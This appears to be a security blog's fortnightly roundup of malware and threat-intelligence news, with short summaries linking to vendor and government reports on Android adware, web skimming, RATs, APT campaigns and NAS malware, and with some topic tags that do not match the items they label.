Android malware and adware, along with mobile espionage made headlines during the last two weeks. No shortage of variety in malicious behavior, there are also articles about some RATs and APTs with current activities.

For more articles, check out our #onpatrol4malware blog.

Android malware

Tracking down the developer of Android adware affecting millions of users

Source: welivesecurity

ESET researchers discovered a year-long adware campaign on Google Play and tracked down its operator. The apps involved, installed eight million times, use several tricks for stealth and persistence. Read more.

malicious Microsoft Office documents

E-SKIMMING: Skimming Online Customer Payment Data From Website Checkout Forms

Source: niccs.us-cert.gov

Cyber criminals introduce skimming code on e-commerce payment card
processing web pages to capture credit card and personally identifiable
information and send the stolen data to a domain under their control. Read more.

Android malware

A Deep-Dive Analysis of the NukeSped RATs

Source: Fortinet

Advanced Persistent Threat (APT) groups pose a great threat to global security, especially groups associated with nation states. Read more.

malicious Microsoft Office documents

SWEED Targeting Precision Engineering Companies in Italy

Source: marcoramilli

The attacker pretended to be a customer and sent to the victim a well crafted email containing a Microsoft XLS file including real spear-parts codes, quantities and shipping addresses. A very similar attack schema to MartyMCFly campaign. Read more.

Android malware

Hackers are using a bug in PHP7 to remotely hijack web servers

Source: The Next Web

The PHP programming language underpins much of the Internet. It forms the basis of popular content management systems like WordPress and Drupal, as well as more sophisticated web applications, like Facebook (kinda). Read more.

malicious Microsoft Office documents

New cyberattacks targeting sporting and anti-doping organizations

Source: Microsoft

Today we’re sharing that the Microsoft Threat Intelligence Center has recently tracked significant cyberattacks originating from a group we call Strontium, also known as Fancy Bear/APT28, targeting anti-doping authorities and sporting organizations around the world. Read more.

malicious Microsoft Office documents

Hiding in Plain Sight: New Adwind jRAT Variant Uses Normal Java Commands to Mask its Behavior

Source: Menlo Security

Street magicians have a secret: If you want to hide something, hide it in plain sight. Unfortunately, malicious actors are learning how to use the same concept to sneak malware past traditional cybersecurity tools and onto users’ computers. Read more.

Android malware

Xhelper: Persistent Android Dropper App Infects 45K Devices in Past 6 Months

Source: Symantec

Symantec has observed a surge in detections for a malicious Android application that can hide itself from users, download additional malicious apps, and display advertisements. Read more.

malicious Microsoft Office documents

The commoditization of mobile espionage software

Source: Talos

The creators of these types of apps can track user’s locations, see their social media usage, and they certainly open the door for abuse by governments hoping to spy on their citizens, parents looking to track their children or controlling spouses hoping to track every move their partners make. Read more.

Android malware

Deepfakes: When seeing isn’t believing

Source: welivesecurity

Deepfakes are rapidly becoming easier and quicker to create and they’re opening a door into a new form of cybercrime. Read more.

malicious Microsoft Office documents

Malware Analysis Report (AR19-304A)
MAR-10135536-8 – North Korean Trojan: HOPLIGHT

Source: CISA

Working with U.S. Government partners, DHS, FBI, and DoD identified Trojan malware variants used by the North Korean government. This malware variant has been identified as HOPLIGHT. Read more.

malicious Microsoft Office documents

QSnatch – Malware designed for QNAP NAS devices

Source: Traficom

In this article a malware dissected by the NCSC-FI specialists is visited upon. The malware is designed specifically for QNAP NAS (Network Attached Storage) devices, and it is capable of various malicious activities in an infected device. Read more.

Android malware

DarkUniverse – the mysterious APT framework #27

Source: Kaspersky SecureList

In April 2017, ShadowBrokers published their well-known ‘Lost in Translation’ leak, which, among other things, contained an interesting script that checked for traces of other APTs in the compromised system. Read more.